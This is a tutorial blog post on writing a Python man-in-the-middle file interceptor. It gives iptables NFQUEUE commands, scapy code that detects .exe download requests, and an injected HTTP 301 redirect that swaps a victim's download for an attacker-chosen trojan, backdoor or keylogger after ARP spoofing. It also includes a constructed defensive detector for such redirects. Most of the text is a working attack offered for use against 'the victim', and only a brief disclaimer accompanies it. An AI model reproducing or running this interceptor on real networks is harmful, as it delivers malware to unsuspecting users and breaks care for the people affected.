Writing a File Interceptor Program in Python: Coding for Cyber Security (Program №5) MITM

Anandita
Nov 9, 2020 · 4 min read

In this article I explain how a basic file interceptor program is developed using Python. Keep in mind that before running this program, we need to run the ARP spoofer and then the iptables command.

If you are targeting remote computers, redirect the FORWARD chain to your queue with the following command:

iptables -I FORWARD -j NFQUEUE --queue-num 0

If you are testing on your local machine, redirect the INPUT and OUTPUT chains instead:

iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -I OUTPUT -j NFQUEUE --queue-num 0

In the previous DNS spoofer program we modified data in the DNS layer; now we are going to modify data in the HTTP layer to perform this attack.

HOW DOES A FILE INTERCEPTOR WORK?

User requesting a file from the server

After detecting such a request, we serve the user a different file, which could also be malicious: a backdoor, a trojan or a keylogger.

Attacker replacing the file with a malicious file

WRITING THE PROGRAM

Step 1: Intercepting the packets

I have used a function that converts the raw packet received from the queue into a scapy packet, and I will explain it step by step.

  1. Import the scapy and netfilterqueue modules. Then define a function that converts the captured packet into a scapy packet so that it can be modified later; the modifications themselves come after the interception part.
  2. Check whether the packet contains an HTTP layer, and separate requests from responses, using the following code.

Step 2: Modification of packets

I have created a list for this purpose: the TCP ack number of each matching request is appended to it, and the entry is removed again once the matching response is seen, using the following piece of code.

acknowledge_list = []

# appending values: remember the ack number of every request for an exe
if b"exe" in pkt_scapy[scapy.Raw].load:   # Raw.load is bytes under Python 3
    print("[*] exe Request")
    acknowledge_list.append(pkt_scapy[scapy.TCP].ack)

# eliminating values: the response whose seq equals a stored ack answers that request
if pkt_scapy[scapy.TCP].seq in acknowledge_list:
    acknowledge_list.remove(pkt_scapy[scapy.TCP].seq)
    print("[*] Replacing File ")

The program can now detect the download requests and their responses. Next, I will show how the downloaded file is replaced with the malicious one.

Replacing the Download file

Every response a server issues to a client request carries a status code. The classes are:

  1. 1xx: Informational
  2. 2xx: Success
  3. 3xx: Redirection
  4. 4xx: Client Error
  5. 5xx: Server Error

I will use the 301 status code in this program, since we intend to redirect the client’s request. So I will add a server response with this status code to the program; all I have to do is set the Location header to the URL of the file that I want the user to download.

HTTP/1.1 301 Moved Permanently
Location: https://www.example.org/index.asp

This is how I have used it in my code :

# the replacement response body; Raw.load must be bytes under Python 3
pkt_scapy[scapy.Raw].load = b"HTTP/1.1 301 Moved Permanently\nLocation: https://www.example.org/abc.exe\n\n"
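As an added example that is not part of the original article, here is a defender-side check for the pattern described in Step 2 and in the 301 redirect above: it pairs each HTTP request for a binary with the response whose TCP seq equals the request's ack (the same matching the acknowledge_list performs) and flags responses that redirect that download to another host or file name, or whose header lines end in bare LF like the injected response. The segment dict layout, the two regexes and the SAMPLE_FLOW data are constructed for this example and are not taken from the article's code.

```python
import re
from urllib.parse import urlparse

# Request for a binary-looking file (captures path and Host) and a 3xx response (captures Location).
DOWNLOAD_RE = re.compile(rb"^GET (\S+\.(?:exe|msi|zip|dmg)) HTTP/1\.[01]\r?\n.*?^Host: (\S+)", re.S | re.I | re.M)
REDIRECT_RE = re.compile(rb"^HTTP/1\.[01] 30[1278] [^\r\n]*\r?\n.*?^Location: (\S+)", re.S | re.I | re.M)

def find_suspicious_redirects(flow):
    """flow: TCP segments as dicts {dir: 'req'|'resp', seq, ack, load: bytes}. Returns one
    alert per download request whose paired response (seq == request's ack) redirects it elsewhere."""
    pending = {}   # request's TCP ack -> (requested path, Host header)
    alerts = []
    for seg in flow:
        if seg["dir"] == "req":
            m = DOWNLOAD_RE.match(seg["load"])
            if m:
                pending[seg["ack"]] = (m.group(1).decode(), m.group(2).decode())
            continue
        match = pending.pop(seg["seq"], None)
        if match is None:
            continue
        path, host = match
        m = REDIRECT_RE.match(seg["load"])
        if not m:
            continue   # a non-redirect answer (e.g. 200 with the real file): nothing to flag
        location = m.group(1).decode()
        target = urlparse(location)
        reasons = []
        if target.hostname and target.hostname.lower() != host.lower():
            reasons.append("redirect leaves the requested host")
        if target.path.rsplit("/", 1)[-1] != path.rsplit("/", 1)[-1]:
            reasons.append("redirect changes the file name")
        if b"\r\n" not in seg["load"]:
            reasons.append("header lines end in bare LF (hand-built response)")
        if reasons:
            alerts.append({"host": host, "path": path, "location": location, "reasons": reasons})
    return alerts

# Constructed sample flow: one hijacked .exe download, then one legitimate .msi download.
SAMPLE_FLOW = [
    {"dir": "req", "seq": 1, "ack": 5000,
     "load": b"GET /files/tool.exe HTTP/1.1\r\nHost: downloads.example.com\r\n\r\n"},
    {"dir": "resp", "seq": 5000, "ack": 60,
     "load": b"HTTP/1.1 301 Moved Permanently\nLocation: https://www.example.org/abc.exe\n\n"},
    {"dir": "req", "seq": 60, "ack": 9000,
     "load": b"GET /files/setup.msi HTTP/1.1\r\nHost: downloads.example.com\r\n\r\n"},
    {"dir": "resp", "seq": 9000, "ack": 121,
     "load": b"HTTP/1.1 200 OK\r\nContent-Length: 4\r\n\r\nMZ.."},
]
```

Legitimate downloads do redirect to CDNs, so a cross-host redirect alone is a review signal rather than proof; the combination with a renamed file and hand-built headers is what makes the constructed case stand out.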

Now I will delete some fields from the response: since the payload has been modified, the length and checksum fields no longer match, so the old values cannot be reused. Deleting them lets scapy recalculate them when the packet is sent. I do this in a function:

def setting_load(packet, load):
    packet[scapy.Raw].load = load
    # drop the stale length and checksum fields so scapy recomputes them
    # (the scapy field is spelled chksum; TCP has no len field, only a checksum)
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

I have made a few more modifications so that the program reads more clearly. The final code is:

RUNNING THE FILE INTERCEPTOR PROGRAM

Install the required modules first:

# pip install NetfilterQueue
# pip install scapy

  1. Run the ARP spoofer program to act as the man in the middle. The ARP spoofer tutorial is given in my previous article.
  2. Run the iptables command given at the start of this article (the FORWARD chain for remote targets, the INPUT and OUTPUT chains for local testing).


  3. Then edit the program as you see fit: the Location URL can be replaced with any payload of your choice. The program is now ready to run. 🙂

As soon as the victim tries to download a file that matches the filter (a request containing "exe" in this program), the replacement file is downloaded to their computer instead of the legitimate one. It can be any malicious file, trojan or backdoor.

The same code is also available on GitHub; it can be fetched and run with the following commands:

# git clone https://github.com/An4ndita/file-interceptor.git
# cd file-interceptor
# mousepad replace-downloads.py

Edit the Location: header and replace it with the link of the file that you want the victim to download, then run:

# python3 replace-downloads.py

Happy Hacking 🙂 Remember that this content is made available for educational and informational purposes only! 🌼 Follow me for more articles on cyber security and please give me your feedback. 🤩
